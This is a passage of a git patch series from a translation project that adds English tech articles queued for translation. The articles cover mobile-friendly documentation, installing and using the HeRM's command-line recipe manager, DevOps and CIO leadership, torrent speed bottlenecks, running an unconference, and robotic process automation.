for small screens. Often, it doesn't scale properly, and it can be difficult to navigate. + +When people access documentation using a mobile device, they usually want a quick hit of information to learn how to perform a task or solve a problem. They don't want to wade through seemingly endless pages to find the specific piece of information they need. Fortunately, it's not hard to address this problem. Here are a few tips to help you structure your documentation to meet the needs of mobile readers. + +### Think short + +That means short sentences, short paragraphs, and short procedures. You're not writing a novel or a piece of long-form journalism. Make your documentation concise. Use as few words as possible to get ideas and information across. + +Use a radio news report as a guide: Focus on the key elements and explain them in simple, direct language. Don't make your reader wade through screen after screen of turgid text. + +Focus on the key elements and explain them in simple, direct language. + +Also, get straight to the point. Focus on the information readers need when they need it. Documentation published online shouldn't resemble the thick manuals of yore. Don't lump everything together on a single page. Break your information into smaller chunks. Here's how to do that: + +### Think topics + +Also, get straight to the point. Focus on the information readers need when they need it. Documentation published online shouldn't resemble the thick manuals of yore. Don't lump everything together on a single page. Break your information into smaller chunks. Here's how to do that: + +In the technical writing world, topics are individual, stand-alone chunks of information. Each topic comprises a single page on your site. Readers should be able to get the information they need--and only that information--from a specific topic. To make that happen, choose which topics to include in your documentation and decide how to organize them: + +### Think DITA + +[Darwin Information Typing Architecture][2], or DITA, is an XML model for writing and publishing. It's been [widely adopted][3] in the technical writing world, especially for longer documentation sets. + +I'm not suggesting that you convert your documentation to XML (unless you really want to). Instead, consider applying DITA's concept of separate types of topics to your documentation: + + * General: overview information + * Task: step-by-step procedures + * Concept: background or conceptual information + * Reference: specialized information like API references or data dictionaries + * Glossary: to define terms + * Troubleshooting: information on problems users may encounter and how to fix them + + + +You'll wind up with a lot of individual pages. To connect those pages: + +### Think linking + +Many content management systems, wikis, and publishing frameworks include some form of navigation--usually a table of contents or [breadcrumbs][4]. It's the kind of navigation that fades into the background on a mobile device. + +For stronger navigation, add explicit links between topics. Place those links at the end of each topic with the heading **See Also** or **Related Topics**. Each section should contain two to five links that point to overview, concept, and reference topics related to the current topic. + +If you need to point to information outside of your documentation set, make sure the link opens in a new browser tab. That sends the reader to another site while also keeping them on your site. + +If you need to point to information outside of your documentation set, make sure the link opens in a new browser tab. + +That takes care of the text. What about graphics? + +### Think unadorned + +That takes care of the text. What about graphics? + +With a few exceptions, images don't add much to documentation. Take a critical look at each image in your documentation. Then ask: + + * Does it serve a purpose? + * Does it enhance the documentation? + * Will readers miss this image if I remove it? + + + +With a few exceptions, images don't add much to documentation. + +If the answer to those questions is no, remove the image. + +If the answer to those questions is no, remove the image. + +On the other hand, if you absolutely can't do without an image, make it [responsive][5]. That way, the image will automatically resize to fit in a smaller screen. + +If you're still not sure about an image, Opensource.com community moderator Ben Cotton offers an [excellent explanation][6] of when to use screen captures in documentation. + +### A final thought + +With a little effort, you can structure your documentation to work well for mobile device users. Another plus: These changes improve documentation for desktop computer and laptop users, too. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/think-mobile + +作者:[Scott Nesbitt][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/chrisshort +[1]:https://www.uxmatters.com/mt/archives/2012/03/mobile-first-what-does-it-mean.php +[2]:https://en.wikipedia.org/wiki/Darwin_Information_Typing_Architecture +[3]:http://dita.xml.org/book/list-of-organizations-using-dita +[4]:https://en.wikipedia.org/wiki/Breadcrumb_(navigation) +[5]:https://en.wikipedia.org/wiki/Responsive_web_design +[6]:https://opensource.com/business/15/9/when-does-your-documentation-need-screenshots From 1daab7fa64d9ff9eab95ae5a0821d254cca0b4f3 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:43:39 +0800 Subject: [PATCH 0823/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20Commandline?= =?UTF-8?q?=20Food=20Recipes=20Manager?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1221 A Commandline Food Recipes Manager.md | 141 ++++++++++++++++++ 1 file changed, 141 insertions(+) create mode 100644 sources/tech/20171221 A Commandline Food Recipes Manager.md diff --git a/sources/tech/20171221 A Commandline Food Recipes Manager.md b/sources/tech/20171221 A Commandline Food Recipes Manager.md new file mode 100644 index 0000000000..63fe9a76ab --- /dev/null +++ b/sources/tech/20171221 A Commandline Food Recipes Manager.md @@ -0,0 +1,141 @@ +HeRM’s - A Commandline Food Recipes Manager +====== +![配图](https://www.ostechnix.com/wp-content/uploads/2017/12/herms-720x340.jpg) + +Cooking is love made visible, isn't? Indeed! Either cooking is your passion or hobby or profession, I am sure you will maintain a cooking journal. Keeping a cooking journal is one way to improve your cooking practice. There are many ways to take notes about the recipes. You could maintain a small diary/notebook or store the recipe's notes in the smartphone or save them in a word document in your computer. There are multitude of options. Today, I introduce **HeRM 's**, a Haskell-based commandline food recipes manager to make notes about your delicious food recipes. Using Herm's, you can add, view, edit, and delete food recipes and even can make your shopping lists. All from your Terminal! It is free, and open source utility written using Haskell programming language. The source code is freely available in GitHub, so you can fork it, add more features or improve it. + +### HeRM's - A Commandline Food Recipes Manager + +#### **Installing HeRM 's** + +Since it is written using Haskell, we need to install Cabal first. Cabal is a command-line program for downloading and building software written in Haskell programming language. Cabal is available in the core repositories of most Linux distributions, so you can install it using your distribution's default package manager. + +For instance, you can install cabal in Arch Linux and its variants such as Antergos, Manjaro Linux using command: +``` +sudo pacman -S cabal-install +``` + +On Debian, Ubuntu: +``` +sudo apt-get install cabal-install +``` + +After installing Cabal, make sure you have added it your PATH. To do so, edit your **~/.bashrc** file: +``` +vi ~/.bashrc +``` + +Add the following line: +``` +PATH=$PATH:~/.cabal/bin +``` + +Press **:wq** to save and quit the file. Then, run the following command to update the changes made. +``` +source ~/.bashrc +``` + +Once cabal installed, run the following command to install herms: +``` +cabal install herms +``` + +Have a cup of coffee! This will take a while. After couple minutes, you will see an output, something like below. +``` +[...] +Linking dist/build/herms/herms ... +Installing executable(s) in /home/sk/.cabal/bin +Installed herms-1.8.1.2 +``` + +Congratulations! Herms is installed. + +#### **Adding recipes** + +Let us add a food recipe, for example **Dosa**. For those wondering, Dosa is a popular south Indian food served hot with **sambar** and **chutney**. It is a healthy, and arguably most delicious food. It contains no added sugars or saturated fats. It is also easy to make one. There are couple types of different Dosas, the most common served in our home is Plain Dosa. + +To add a recipe, type: +``` +herms add +``` + +You will see a screen something like below. Start entering the recipe's details. + +[![][1]][2] + +To navigate through fields,use the following keyboard shortcuts: + + * **Tab / Shift+Tab** - Next / Previous field + * **Ctrl + ** - Navigate fields + * **[Meta or Alt] + ** - Navigate fields + * **Esc** - Save or Cancel. + + + +Once you added the recipe's details, press ESC key and hit Y to save it. Similarly, you can add as many recipes as you want. + +To list the added recipes, type: +``` +herms list +``` + +[![][1]][3] + +To view the details of any recipes listed above, just use the respective number like below. +``` +herms view 1 +``` + +[![][1]][4] + +To edit any recipes, use: +``` +herms edit 1 +``` + +Once you made the changes, press ESC key. You'll be asked whether you want to save or not. Just choose the appropriate option. + +[![][1]][5] + +To delete a recipe, the command would be: +``` +herms remove 1 +``` + +To generate a shopping list for a given recipe(s), run: +``` +herms shopping 1 +``` + +[![][1]][6] + +For help, run: +``` +herms -h +``` + +The next time you overhear a conversation about a good recipe from your colleague or friend or somewhere else, just open Herms and quickly take a note and share them to your spouse. She would be delighted! + +And, that's all. More good stuffs to come. Stay tuned! + +Cheers!! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/herms-commandline-food-recipes-manager/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[2]:http://www.ostechnix.com/wp-content/uploads/2017/12/Make-Dosa-1.png () +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/herms-1-1.png () +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/herms-2.png () +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/herms-3.png () +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/herms-4.png () From 52af3f928f2cd392e63c6898f04018f3924afa15 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:46:57 +0800 Subject: [PATCH 0824/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20DevOps?= =?UTF-8?q?=20teams=20really=20need=20from=20a=20CIO?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...hat DevOps teams really need from a CIO.md | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 sources/tech/20171205 What DevOps teams really need from a CIO.md diff --git a/sources/tech/20171205 What DevOps teams really need from a CIO.md b/sources/tech/20171205 What DevOps teams really need from a CIO.md new file mode 100644 index 0000000000..d86f549d18 --- /dev/null +++ b/sources/tech/20171205 What DevOps teams really need from a CIO.md @@ -0,0 +1,59 @@ +What DevOps teams really need from a CIO +====== +IT leaders can learn from plenty of material exploring [DevOps][1] and the challenging cultural shift required for [making the DevOps transition][2]. But are you in tune with the short and long term challenges that a DevOps team faces - and what they really need from a CIO? + +In my conversations with DevOps team members, some of what I heard might surprise you. DevOps pros (whether part of an internal or external team) want to put the following things at the top of your CIO radar screen. + +### 1. Communication + +First and foremost, DevOps pros need peer-level communication. An experienced DevOps team is extremely knowledgeable on current DevOps trends, successes, and failures in the industry and is interested in sharing this information. DevOps concepts are difficult to convey, so be open to a new working relationship in which there are regular (don't worry, not weekly) conversations about the current state of your IT, how the pieces in the environment communicate, and your overall IT estate. + +**[ Want even more wisdom from CIOs on leading DevOps? See our comprehensive resource,[DevOps: The IT Leader's Guide][3]. ]** + +Conversely, be prepared to share current business needs and goals with the DevOps team. Business objectives no longer exist in isolation from IT: They are now an integral component of what drives your IT advancements, and your IT determines how effectively you can execute on your business needs and goals. + +Focus on participating rather than leading. You are still the ultimate arbiter when it comes to decisions, but understand that these decisions are best made collaboratively in order to empower and motivate your DevOps team. + +### 2. Reduction of technical debt + +Second, strive to better understand technical debt and how DevOps efforts are going to reduce it. Your DevOps team is working hard on this front. In this case, technical debt refers to the manpower and infrastructure resources that are usurped daily by maintaining and adding new features on top of a monolithic, non-sustainable environment (read Rube Goldberg). + +Common CIO questions include: + + * Why do we need to do things in a new way? + * Why are we spending time and money on this? + * If there's no new functionality, just existing pieces being broken out with automation, then where is the gain? + + + +The "if it ain't broke don't fix it" thinking is understandable. But if the car is driving fine while everyone on the road accelerates past you, your environment IS broken. Precious resources continue to be sucked into propping up or augmenting an environmental kluge. + +Addressing every issue in isolation results in a compromised choice from the start that is worsened with each successive patch - layer upon layer added to a foundation that wasn't built to support it. In actuality, this approach is similar to plugging a continuously failing dike. Sooner or later you run out of fingers and the whole thing buckles under the added pressures, drowning your resources. + +The solution: automation. The result of automation is scalability - less effort per person to maintain and grow your IT environment. If adding manpower is the only way to grow your business, then scalability is a pipe dream. + +Automation reduces your manpower requirements and provides the flexibility required for continued IT evolution. Simple, right? Yes, but you must be prepared for delayed gratification. An upfront investment of time and effort for architectural and structural changes is required in order to reap the back-end financial benefits of automation with improved productivity and efficiency. Embracing these challenges as an IT leader is crucial in order for your DevOps team to successfully execute. + +### 3. Trust + +Lastly, trust your DevOps team and make sure they know it. DevOps experts understand that this is a tough request, but they must have your unquestionable support and your willingness to actively participate. It will often be a "learn as you go" experience for you as the DevOps team successively refines your IT environment, while they themselves adapt to ever-changing technology. + +Listen, listen, listen to them and trust them. DevOps changes are valuable and well worth the time and money through increased efficiency, productivity, and business responsiveness. Trusting your DevOps team gives them the freedom to make the most effective IT improvements. + +The new CIO bottom line: To maximize your DevOps team's potential, leave your leadership comfort zone and embrace a "CIOps" transition. Continuously work on finding common ground with the DevOps team throughout the DevOps transition, to help your organization achieve long-term IT success. + + +-------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/12/what-devops-teams-really-need-cio + +作者:[John Allessio][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/john-allessio +[1]:https://enterprisersproject.com/tags/devops +[2]:https://www.redhat.com/en/insights/devops?intcmp=701f2000000tjyaAAA +[3]:https://enterprisersproject.com/devops?sc_cid=70160000000h0aXAAQ From f5e6e675d240a3d098c2a77ce181e9586a720d7c Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:52:49 +0800 Subject: [PATCH 0825/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Increase=20Torr?= =?UTF-8?q?ent=20Speed=20-=20Here=20Is=20Why=20It=20Will=20Never=20Work?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Speed - Here Is Why It Will Never Work.md | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md diff --git a/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md b/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md new file mode 100644 index 0000000000..55413f97aa --- /dev/null +++ b/sources/tech/20171203 Increase Torrent Speed - Here Is Why It Will Never Work.md @@ -0,0 +1,68 @@ +translating by lujun9972 +Increase Torrent Speed - Here Is Why It Will Never Work +====== + +Haven't we always wanted **better torrent speed**? No matter how much you have. You just can 't get enough of it. Our obsession with torrenting speed has often resulted in trying out those tricks from several websites including YouTube videos. And believe me, ever since I was a child till date I haven't found luck with it. So in this article, Let us have a look at why trying to increase torrent speed never works. + +## Factors that affect speed + +### Local Factors + +In the image below you can see that there are 3 computers with User A, B, and C. Now A and B are connected to each locally and C is somewhere far with multiple connection points 1,2 and 3 in between. + +[![][1]][2] + +If user A and B have to share files between them, they can directly do so without the need for torrents with the maximum speed available. This speed does not rely on the internet or anything. + + * The capacity of the wire + + * The capacity of network card of the devices + + * The capacity of the router + +I always see people talk about complicated stuff when it comes to torrenting but they always miss out on important factors. + +[![LAN wire, network cards, router][3]][3] + +Now we are talking about local file share, The usual network cards that people have in their newer devices are of 1 Gigabit. The common routers are around 300 Megabits and the wires can also mostly take 100 Megabits. Now you might be having a different setup but I am just giving a general example. + +Since you have a 1 Gigabit Network adapter, you believe that you should get 125 Megabytes in speed. But the router is only capable of only transferring a 300 Megabits which is 30 Megabyte. + +Even if you wanted to bargain at 30 Megabytes, The cable/link connecting you to the router is only capable of 100 megabits or 10 MegaBytes at best. This is a pure case of bottlenecking where one weak component affects the other stronger ones as transfers will happen with only 10 Megabytes which is the cable's limit. Now imagine a torrent which can be downloaded at extreme speed. But it is your weak hardware creating the bottleneck. + +### Foreign Factors + +Look at this image again. User C is somewhere far away. Probably in another country. **** + +[![how torrent works][1]][2] + +If this user created a torrent and you were to download it. The first problem would be the one we have already discussed. You wouldn 't be able to cross the 10 Megabyte mark. + +Secondly, since there are multiple points in between, maybe one of them could become the bottleneck again, it might have too much traffic and comparatively weaker hardware. Resulting in lower speed. + +### Seeders & Leechers + +There has already been too much discussion about it and the general idea is to have more seeders. I've also discussed seeders and leechers in [this article][4]. This is true, but keeping the above factor in mind, good seeders from a location that doesn't have a great link with mine is of no help at all. Usually, this doesn't happen most of the time as we are not the only ones downloading it and someone from our locality already has the file and is now seeding it. + +## Conclusion + +We tried to understand the reason behind our good or bad torrent speed. Irrespective of how many software tweaks we try, most of the times it is the physical barrier. I have usually never had any problems with the software and the default settings have worked for me. + +I hope you liked the article, Please feel free to pen down your thoughts in the comment section below. + + +-------------------------------------------------------------------------------- + +via: http://www.theitstuff.com/increase-torrent-speed-will-never-work + +作者:[Rishabh Kandari][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.theitstuff.com/author/reevkandari +[1]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-550x275.png +[2]:http://www.theitstuff.com/wp-content/uploads/2017/11/A.png +[3]:http://www.theitstuff.com/wp-content/uploads/2017/11/A-1-e1509773618549.png +[4]:http://www.linuxandubuntu.com/home/torrents-everything-you-need-to-know From 1fa2832c3c6d17ec7fcbd5dd011715e3dc88e902 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:56:21 +0800 Subject: [PATCH 0826/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=203=20ways=20robo?= =?UTF-8?q?tics=20affects=20the=20CIO=20role?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...03 3 ways robotics affects the CIO role.md | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 sources/tech/20171103 3 ways robotics affects the CIO role.md diff --git a/sources/tech/20171103 3 ways robotics affects the CIO role.md b/sources/tech/20171103 3 ways robotics affects the CIO role.md new file mode 100644 index 0000000000..92cdc73509 --- /dev/null +++ b/sources/tech/20171103 3 ways robotics affects the CIO role.md @@ -0,0 +1,51 @@ +3 ways robotics affects the CIO role +====== +As 2017 comes to a close, many CIOs are solidifying their goals for 2018. Perhaps yours involve robotic process automation (RPA.) For years, RPA has been a distant concept for many companies. But as organizations are forced to become ever more nimble and efficient, the potential benefits of RPA bear examining. + +According to a recent[ survey][1] by Redwood Software and Sapio Research, IT decision makers believe that 59 percent of business processes can be automated in the next five years, creating new speed and efficiency while relieving their human counterparts of repetitive manual workloads. However, 20 percent of companies with more than 1000 employees currently have no RPA strategy in place. + +For CIOs, RPA has implications for your role in the business and for your team. Here are three ways that the role of the CIO and other IT decision makers can change as RPA gains prominence in 2018: + +### Added opportunity to be strategic change agents + +As the pressure grows to do more with less, internal processes matter greatly. In every enterprise, employees across departments are performing critical - yet mundane - tasks every single day. These tasks may be boring and repetitive, but they must be performed quickly, and often with no room for error. + +**[ For advice on maximizing your automation strategy's ROI, see our related article,[How to improve ROI on automation: 4 tips][2]. ]** + +From back-office operations in finance to procurement, supply chain, accounting, customer service, and human resources, nearly every position within an organization is plagued with at least some monotonous tasks. For CIOs, this opens up an opportunity to unite the business with IT and spearhead strategic change with RPA. + +Having evolved far beyond screen-scraping technology of the past, robots are now customizable, plug-and-play solutions that can be built to an organization's specific needs. With such a process-centric approach, companies can automate not only tasks previously executed by humans, but also application and system-specific tasks, such as ERP and other enterprise applications. + +Enabling a greater level of automation for end-to-end processes is where the value lies. CIOs will be on the front line of this opportunity. + +### Renewed focus on people and training + +Technology shifts can be unnerving to employees, especially when these changes involve automating substantial portions of their daily duties. The CIO should articulate how RPA will change roles and responsibilities for the better, and fuel data-driven, strategic decisions that will ultimately impact the bottom line. + +When implementing RPA, it's important to convey that humans will always be critical to the success of the organization, and that success requires the right balance of technology and human skills. + +CIOs should also analyze workflow and implement better processes that go beyond mimicking end-user specific tasks. Through end-to-end process automation, CIOs can enable employees to shine. + +Because it will be important to upskill and retrain employees throughout the automation process, CIOs must be prepared to collaborate with the C-suite to determine training programs that help employees navigate the change with confidence. + +### Demand for long-term thinking + +To succeed with robotic process automation, brands must take a long-term approach. This will require a scalable solution, which in turn will benefit the entire business model, including customers. When Amazon introduced faster delivery options for Prime customers, for example, it didn't just retool the entire order fulfillment process in its warehouses; it automated its online customer experience to make it simpler, faster, and easier than ever for consumers to place orders. + +In the coming year, CIOs can approach technology in the same way, architecting holistic solutions to change the way an organization operates. Reducing headcount will net only so much in bottom-line results, but process automation allows CIOs to think bigger through optimization and empowerment. This approach gives CIOs the opportunity to build credibility for the long haul, for themselves and for RPA. This in turn will enhance the CIO's role as a navigator and contributor to the organization's overall success. + +For CIOs, taking a long-term, strategic approach to RPA success takes time and hard work. Nevertheless, CIOs who commit the time to create a strategy that balances manpower and technology will deliver value now and in the future. + +-------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/3-ways-robotics-affects-cio-role + +作者:[Dennis Walsh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/dennis-walsh +[1]:https://www.redwood.com/press-releases/it-decision-makers-speak-59-of-business-processes-could-be-automated-by-2022/ +[2]:https://enterprisersproject.com/article/2017/11/how-improve-roi-automation-4-tips?sc_cid=70160000000h0aXAAQ From 520f3acbd1af6e7adf744f3d92ecdb60d8241b0d Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:00:23 +0800 Subject: [PATCH 0827/1627] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E9=85=8D=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171103 3 ways robotics affects the CIO role.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171103 3 ways robotics affects the CIO role.md b/sources/tech/20171103 3 ways robotics affects the CIO role.md index 92cdc73509..a14027aebc 100644 --- a/sources/tech/20171103 3 ways robotics affects the CIO role.md +++ b/sources/tech/20171103 3 ways robotics affects the CIO role.md @@ -1,5 +1,6 @@ 3 ways robotics affects the CIO role ====== +![配图](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_ai.png?itok=toMIgELj) As 2017 comes to a close, many CIOs are solidifying their goals for 2018. Perhaps yours involve robotic process automation (RPA.) For years, RPA has been a distant concept for many companies. But as organizations are forced to become ever more nimble and efficient, the potential benefits of RPA bear examining. According to a recent[ survey][1] by Redwood Software and Sapio Research, IT decision makers believe that 59 percent of business processes can be automated in the next five years, creating new speed and efficiency while relieving their human counterparts of repetitive manual workloads. However, 20 percent of companies with more than 1000 employees currently have no RPA strategy in place. From 30526352e9110798f88d8a2597a6722414c5480e Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:06:40 +0800 Subject: [PATCH 0828/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Tap=20the=20pow?= =?UTF-8?q?er=20of=20community=20with=20organized=20chaos?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...power of community with organized chaos.md | 110 ++++++++++++++++++ 1 file changed, 110 insertions(+) create mode 100644 sources/tech/20171130 Tap the power of community with organized chaos.md diff --git a/sources/tech/20171130 Tap the power of community with organized chaos.md b/sources/tech/20171130 Tap the power of community with organized chaos.md new file mode 100644 index 0000000000..d7664ec21f --- /dev/null +++ b/sources/tech/20171130 Tap the power of community with organized chaos.md @@ -0,0 +1,110 @@ +Tap the power of community with organized chaos +====== +In this article, I want to share with you of the power of an unconference--because I believe it's a technique anyone can use to generate innovative ideas, harness the power of participation, and strengthen community ties. I've developed a 90-minute session that mimics the effects of an unconference, and you can use it to generate engagement with a small group of people and tap into their ideas surrounding a topic of your choice. + +An "unconference" is a loosely organized event format designed specifically to maximize the exchange of ideas and the sharing of knowledge in a group driven by a common purpose. While the structure of an unconference is planned, the content and exchange of ideas for breakout sessions is not. Participants plan and execute unconference sessions by voting on the content they'd like to experience. + +For larger events, some organizers allow the submission of session topics in advance of the event. This is helpful for people new to the unconference format who may not understand what they could expect to experience at the event. However, most organizers have a rule that a participant must be present to pitch and lead a session. + +One of the more popular unconferences is BarCamp. The unconference brings together people interested in a wide range of topics and technologies. As with any unconference, everyone that attends has the opportunity to share, teach, and participate. Other popular unconferences include EduCamp (with a focus on education) and CityCamp (with a focus on government and civic technology). + +As you'll discover when you do this exercise, the success of the unconference format is based on the participants that are involved and the ideas they want to share. Let's take a look at the steps needed to facilitate an unconference exercise. + +### Materials needed + +To facilitate this exercise, you will need: + + * A room for 15-20 people + * Tables and chairs for the group + * Ability to break into two or three groups + * Markers and pens + * "Dot" stickers (optional) + * Sheets of plain paper or larger sticky notes + * Timer (alarm optional) + * Moveable whiteboard (optional) + * Pre-defined topic for participants + * Facilitator(s) + + + +### Facilitation steps + +**Step 1.** Before leading the exercise, the facilitator should pre-select a topic on which the participants should generate and pitch ideas to the group. It could be a business challenge, a customer problem, a way to increase productivity, or a problem you'd like to solve for your organization. + +**Step 2.** Distribute paper or sticky notes and markers/pens to each participant. + +**Step 3.** Introduce the topic that will be the focus of the unconference exercise and ask participants to begin thinking about their pitch. Explain the process, the desired outcome, and the following timeline for the exercise: + + * 10 minutes: Explain process and pitch prep + * 20 minutes: 1-minute pitches from each participant + * 10 minutes: Voting + * 10 minutes: Break / count votes + * 5 minutes: Present top selections and breakout sessions + * 25 minutes: Breakout collaboration + * 10 minutes: Readouts + + + +**Step 4.** Ask participants to first prepare a 30 ‒60 second pitch based on the topic. This is an idea they want to share with the group to potentially explore in a breakout session. Participants should compose a title, brief description, and add their name to the paper you handed out. Pro-tip: Leave room for voting at the bottom. + +An example format for a pitch sheet might look like this: + +Title: + +Description: + +Name: + +Voting: + +**Step 5.** Begin the pitch process and time each participant for 60 seconds. Instruct each participant to share their name, title, and to briefly describe their idea (this is "the pitch.") If a participant begins to go over time, kindly stop them by starting to clap, others will follow suit. Alternatively, you can use an alarm on the timer. As each participant finishes a pitch, the group should clap to encourage others and boost confidence for the other pitches. + +**Step 6.** At the conclusion of each pitch the facilitator should lay out the pitch papers on a table, tape them to the wall, or post them to a moveable whiteboard so participants can vote on them before heading out for the break (second pro-tip: Don't use sharpies to vote if you tape pitch papers to the wall. You've been warned). Allow at least 20 minutes for steps 5 and 6. + +**Step 7.** After the pitches, give all participants three votes to select the topic(s) they are most interested in discussing or exploring further. Have them vote on the pitch paper, using tick marks, with the markers or pens. Alternatively, you can "dot" vote with circular stickers. Votes can spread out or stacked for preferred topics. Allow up to 10 minutes for this step. + +**Step 8.** While participants take a break, facilitators should count the votes on each pitch paper and determine the top two or three ideas. I prefer to count the votes on each pitch paper and write the number in a circle on the paper. This helps me visually see what pitches are the most popular. This will take about 10 minutes. + +**Step 9.** After the break, present these top ideas and ask the presenters of these ideas to lead a breakout session based on their pitches. For larger unconference events, there is a lot more organizing of the sessions with multiple rooms and multiple timeslots occurring. This exercise is drastically simplifying this step. + +**Step 10.** Divide participants into two or three breakout sessions. Ask participants to self-select the breakout session that is most interesting to them. Having balanced groups is preferable. + +**Step 11.** Ask pitch presenters to lead their breakout sessions with the goal of arriving at a prototype of a solution for the idea they pitched. In my experience, things will start off slow, then it will be hard to stop the collaboration. Allow up to 20 minutes for this step. + +**Step 12.** As you approach the end of the breakout sessions, ask participants to prepare their top takeaways for a group readout. Give groups a five-minute and then a two-minute warning to prepare their key takeaways. + +**Step 13.** Ask each breakout group to designate a spokesperson. + +**Step 14.** The spokesperson from each breakout group shall present their key takeaways and a summary of their prototype to the entire group. Divide the time equally between groups. A few questions from other groups are fine. This should last about 10 minutes. + +**Step 15.** Facilitators should summarize the session, encourage further action, and conclude the exercise. + +### Reflection + +I've previously run this exercise with a group of approximately twenty middle school and high school students with the sole purpose of introducing the concept of an unconference to them. For the last three years, in fact, I've had the privilege of hosting a group of bright, young students participating in the [Raleigh Digital Connector Program][1]. I host them at Red Hat, give them a quick tour of our office space, then lead them through this unconference exercise to help them prepare for an annual civic tech event called CityCamp NC, which brings citizens, government change agents, and businesses together to openly innovate and improve the North Carolina community. + +To recap on the general exercise, the facilitator's job is to keep things on time and moving through the process. The participants' job is to be present, share ideas, and build on other ideas. In this smaller setting, having everyone give a pitch is important, because you want everyone to share an idea. In my experience, you never know what you're going to get and I'm alway pleasantly surprised by the ones that get voted up. + +I often get participants who wish they would have made a pitch or shared a topic near and dear to them--after it was all over. Don't be that person. + +In larger events, facilitator's should to drive participants to have some type of outcome or next step by the end of their session. Getting people together to discuss an idea or share knowledge is great, but the most valuable sessions allow participants to leave with something to look forward to after the event. + +I will often refer to unconferences as organized chaos. Once first-timers go through the process, I've had many participants express sheer joy that they've never experienced this level of collaboration and knowledge sharing. On the other end of the spectrum, I often get participants who wish they would have made a pitch or shared a topic near and dear to them--after it was all over. Don't be that person. If you ever find yourself at an unconference, I encourage you to do a pitch. Be prepared to participate, jump right in, and enjoy the experience. + +As you get more experience, you can convert this unconference exercise into a full-blown unconference event for your organization. And the results should be astonishing. + +This article is part of the [Open Organization Workbook project][2]. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/11/tap-community-power-unconference + +作者:[Jason Hibbets][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jhibbets +[1]:https://www.raleighnc.gov/safety/content/ParksRec/Articles/Programs/TechnologyEducation/DigitalInclusionPrograms.html +[2]:https://opensource.com/open-organization/17/8/workbook-project-announcement From 500f38ed84fd5140ac79b120b03f92dbfeed7940 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:12:30 +0800 Subject: [PATCH 0829/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Check=20Cryptoc?= =?UTF-8?q?urrency=20Prices=20From=20Commandline?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Cryptocurrency Prices From Commandline.md | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 